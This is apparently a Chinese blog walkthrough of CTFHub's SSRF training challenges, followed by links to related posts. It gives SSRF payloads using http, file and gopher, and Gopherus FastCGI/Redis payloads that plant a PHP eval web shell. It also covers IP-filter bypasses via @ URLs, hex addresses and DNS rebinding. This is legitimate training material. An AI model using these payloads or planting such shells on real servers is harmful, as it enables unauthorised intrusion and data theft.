CTFHub技能树 Web-SSRF篇(通过教程)

已于 2024-07-24 20:02:35 修改
阅读量532 收藏 12
点赞数 6
文章标签: 前端
于 2024-07-24 20:01:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/140671068
版权

第一部分(Http、Dict和file等协议的利用)

内网访问

尝试访问位于127.0.0.1的flag.php吧

我们是从目标主机内网环境访问它本地的flag.php,我们构建url:

目录

第一部分(Http、Dict和file等协议的利用)

内网访问

/?url=http://127.0.0.1/flag.php

为协议读取文件

尝试去读取一下Web目录下的flag.php吧

我们尝试直接访问,发现访问不到。

那么他提供给我们的信息常使用web目录访问的话就是暗示我们用file协议

我们构建如下payload:

/?url=file:///var/www/html/flag.php

 

查看一下源代码

端口扫描

CTFHub在线扫端口,端口范围是8000-9000

开启环境之后,直接使用burpsuite的狙击手模式直接开始爆破

设置变量的类型(Numbers)和范围(8000-9000)

直接爆破,寻找端口,然后访问这个端口,此端口就是flag所在

 第二部分(Gopher协议的利用)

POST请求

这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

我们访问 127.0.0.1/flag.php 会得到一个输入框

因为是post请求所以得

查看源码

会得到一个key值 a23efde9fbddeb0cd5755d9a532c9342

这一题很简单

上传文件

我们尝试访问 ?/url=127.0.0.1/flag.php

发现有上传页面但是并没有提交按钮

我们可以通过查看源码,并在from表单中写入 submit  ,如下图:

<input type="submit" name="submit">

随便上传一个比较小的文件,然后抓包

根据我们抓的包,把他进行修改一下 

POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 292
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1lYApMMA3NDrr2iY
 
------WebKitFormBoundary1lYApMMA3NDrr2iY
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
 
SSRF Upload
------WebKitFormBoundary1lYApMMA3NDrr2iY
Content-Disposition: form-data; name="submit"
 
提交
------WebKitFormBoundary1lYApMMA3NDrr2iY--

将写好的数据包进行两次转码 

第一次完成后需要将%0A修改为%0D%0A

第二次结束之后然后用gopher协议访问

 

 

 FastCGI协议

我们这里使用Gopherus脚本(GitHub下载)构造payload

我们先将Gopherus脚本下载至服务器上

下载地址:https://github.com/tarunkant/Gopherus.git

然后使用python2在kali上运行下列代码

python gopherus.py --exploit fastcgi
/var/www/html/index.php                 # 这里输入的是一个已知存在的php文件
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4 | base64 -d > /var/www/html/shell.php
​

<?php eval($_POST[whoami]);?>
base64加密
PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4

 

 需要将生成的进行一次编码,因为get本身会进行一次url解码

然后访问

和上传文件的方式一样

然后用中国菜刀连接

 在跟目录发现了一个flag包打开就是flag

Redis协议

和fastcgi一样继续使用gopherus

但是需要改改

再次进行编码,编码之后和上一个题一样去运行,运行会一直处于转圈中,我们可以访问一下/shell.php页面,

 继续和上一题一样用中国菜刀访问根目录下的flag文件就是我们需要的flag密码

Bypass

URL Bypass

构造urlbypass payload

利用@符号绕过

http://challenge-71a16ac5a43dfae7.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

 

数字IP Bypass 

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

10进制确实被禁止,可以使用可以十六进制,二进制等其他进制

127.0.0.1

十六进制 = 7F000001
二进制 = 1111111000000000000000000000001

302跳转 Bypass 

这一关主要检测127.0.0.1,绕过就行

进制转换

具有127.0.0.1含义的其他地址

参考关于localhost,0.0.0.0及127.0.0.1的区别

都可以直接KO,

进制转换   16进制  2进制(会被检测)
?url=0x7F000001/flag.php
?url=http://0x7F000001/flag.php
其他代表127.0.0.1地址符号的  localhost  0  
localhos在IPV4中被指向127.0.0.1 
?url=localhost/flag.php
?url=http://localhost/flag.php
?url=0/flag.php
?url=http://0/flag.php

 

 DNS重绑定 Bypass

上一关的localhost、0是不行的

这是一个测试dns重绑定漏洞的网站,可以让一个域名随机的绑定两个IP

一个127.0.0.1,一个其他的ip(能访问就行,我设置的是自己的服务器ip)

然后直接在url中输入

?url=7000001.7cddf025.rbnd.us/flag.php

感谢大家的观看 

外道・輪廻天生
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub技能树 Web-SSRF 302跳转 Bypass
Senimo
07-05 3412
CTFHub技能树 Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧 启动环境,依然为空白界面,查看URL: http://challenge-722b117ccdc24f8e.sandbox.ctfhub.com:10800/?url=_ 其中有通过GET传参的url,尝试访问127.0.0.1/flag.php页面: 提示:不允许企业内部IP访问,使用file协议
CTFHub技能树 Web-SSRF 数字IP Bypass
Senimo
07-01 654
CTFHub技能树 Web-SSRF 数字IP Bypass hint:这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢 启动环境,页面为空白,查看URL: http://challenge-1c640dd5655b47b9.sandbox.ctfhub.com:10800/?url=_ 根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001 构造题目有所需 Payload:?url=0x7f000001/
CTFHub技能树 Web-SSRF(保姆级通过教程
weixin_45808483的博客
11-10 5235
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
CTFHub技能树 Web-SSRF URL Bypass
Senimo
07-01 952
CTFHub技能树 Web-SSRF URL Bypass hint:请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧 启动环境,打开题目: 给出提示,url参数的值中必须包含有http://notfound.ctfhub.com 可以采用@,也就是 HTTP 基本身份认证绕过 HTTP 基本身份认证允许 Web 浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。 也就是:http://www.xxx.c
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1024
CTFHub技能树-web-ssrf
CTFHub技能树 Web-SSRF POST请求
Senimo
07-02 2782
POST请求 hint:这次是发一个HTTP POST请求,对了,ssrf是用php的curl实现的,并且会跟踪302跳转,加油吧骚年。 启动环境,访问页面为空白,查看URL: http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_ 通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框: 查看源码: <form action="/flag.php" method="post"> &l
CTFHub技能树 Web-SSRF DNS重绑定 Bypass
Senimo
07-05 1845
CTFHub技能树 Web-SSRF DNS重绑定 Bypass hint:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助 启动环境,打开题目为空白,查看URL: http://challenge-cafd9f03daa84720.sandbox.ctfhub.com:10800/?url=_ 与之前一样的形式,查看?url=127.0.0.1/flag.php: 提示不允许企业内部IP访问,尝试使用file协议读取源码:?url=file:///var/www/html/index.
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1780
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
CTFHub技能树 Web-SSRF 内网访问
Senimo
07-01 421
CTFHub技能树 Web-SSRF 内网访问 hint:尝试访问位于127.0.0.1的flag.php吧 启动环境,访问页面为空白,查看URL: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=_ 其中存在 GET 方式的传参:url=_,将127.0.0.1/flag.php地址填入尝试访问: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-WEB入门DOC-2019版1
08-03
2. 靶场:如BUUOJ、南邮0xCTFCTF.show、CTFhub、BugKuCTF、攻防世界等,提供实践环境。 3. 学习平台:CTF-Wiki-Web、dalao们的博客、先知社区、freebuf、安全客等。 4. 书籍:《白帽子讲Web安全》、《Web安全攻防...
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
104-web漏洞挖掘之SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞是网络安全领域中的一种常见问题,它允许攻击者通过构造特定的请求,使得服务器端发起恶意的外部请求。SSRF漏洞的本质是利用服务器作为一个代理,攻击者可以借此访问那些仅...
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 176
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 965
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
VUE 子组件可以直接改变父组件的数据吗
Cshaosun的博客
07-23 108
如果子组件需要修改父组件的数据,‌应该通过触发一个自定义事件来通知父组件进行数据的变更。‌父组件在接收到子组件触发的事件后,‌可以修改数据,‌从而间接地改变父组件的数据。‌这种方式通过明确的事件通信机制,‌保证了数据流的单向性和组件之间的解耦。需要注意的是,‌虽然Vue提供了一些特殊的方法来实现子组件修改父组件数据,‌但这种方式打破了数据流的单向性,‌增加了组件之间的耦合性,‌因此应谨慎使用。在Vue中,‌如果确实需要在子组件中修改父组件的数据,‌可以通过以下步骤实现:‌。
Odoo Registry 源码解读:前端世界的魔法师
最新发布
清水欧度 Odoo ERP
07-23 758
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值